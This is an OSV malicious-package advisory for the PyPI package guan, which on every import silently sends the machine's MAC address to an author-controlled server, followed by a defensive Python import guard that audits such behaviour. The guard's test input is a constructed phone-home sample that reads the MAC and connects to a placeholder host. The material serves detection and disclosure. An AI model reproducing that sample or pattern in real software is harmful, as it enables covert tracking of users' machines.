OSV ID
MAL-2026-3692
Ecosystem
pypi
Summary
The top-level src/guan/__init__.py unconditionally calls statistics_of_guan_package() on every "import guan". That function (in src/guan/others.py) opens a raw TCP socket to the hardcoded, author-controlled endpoint socket.guanjihuan.com:12345 and sends a JSON payload containing the installing machine's MAC address (obtained via uuid.getnode()), the guan package version, and a timestamp. There is no opt-out, the behavior is not documented in the README or PKG-INFO, and no user consent is requested. This constitutes silent collection of a stable hardware identifier from every machine that imports the package, transmitted to an author-controlled server: an installer-side data exfiltration pattern, not merely author-side self-harm. While the payload is narrow (MAC address, version and time), MAC addresses are persistent hardware identifiers suitable for tracking, correlating, and deanonymizing developer and build machines.
Source: amazon-inspector (2e04a9a658bc7616e72a5edf276dd049e5b697f2492c46929caf2e01fac95d84)
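A defensive check for the import-time phone-home pattern described in the summary, as an added example that is not code from the guan package or from the OSV record: it runs a module's top-level code under a guard that refuses every socket.connect() and returns a dummy value from uuid.getnode(), recording both so the attempt is visible without any packet leaving the machine. The sample module and the host telemetry.invalid are constructed stand-ins, not the package's source.

```python
import socket
import uuid
from contextlib import contextmanager
from dataclasses import dataclass, field

@dataclass
class ImportAudit:
    """What a module's top-level code tried to do while it ran under the guard."""
    connects: list = field(default_factory=list)  # addresses passed to socket.connect
    hardware_id_reads: int = 0                    # calls to uuid.getnode()

@contextmanager
def import_guard(audit: ImportAudit):
    """Refuse outbound TCP and hide the real MAC while the body runs."""
    orig_connect, orig_getnode = socket.socket.connect, uuid.getnode

    def blocked_connect(self, address):
        audit.connects.append(address)  # record the attempt, then refuse it
        raise ConnectionRefusedError("outbound connection blocked by import guard")

    def fake_getnode():
        audit.hardware_id_reads += 1
        return 0x020000000000  # locally administered dummy MAC, never the real one

    socket.socket.connect, uuid.getnode = blocked_connect, fake_getnode
    try:
        yield audit
    finally:
        socket.socket.connect, uuid.getnode = orig_connect, orig_getnode

def audit_module_source(source: str, name: str = "suspect") -> ImportAudit:
    """Run a module's top-level code the way `import` would, under the guard."""
    audit = ImportAudit()
    with import_guard(audit):
        try:
            exec(compile(source, f"<{name}>", "exec"), {"__name__": name})
        except ConnectionRefusedError:
            pass  # the refused connect is the finding; it is already recorded
    return audit

# Constructed stand-in for the pattern described in the summary (not the package's code).
PHONE_HOME_SAMPLE = """
import json, socket, uuid
payload = json.dumps({"mac": uuid.getnode()}).encode()
socket.socket().connect(("telemetry.invalid", 12345))  # placeholder host, never reached
"""
CLEAN_SAMPLE = "import os\nVALUE = 1\n"
```

Only socket.socket.connect is hooked; code using connect_ex(), sendto() or a subprocess would bypass this guard, so treat a clean audit as one signal and pair it with a network-isolated install sandbox.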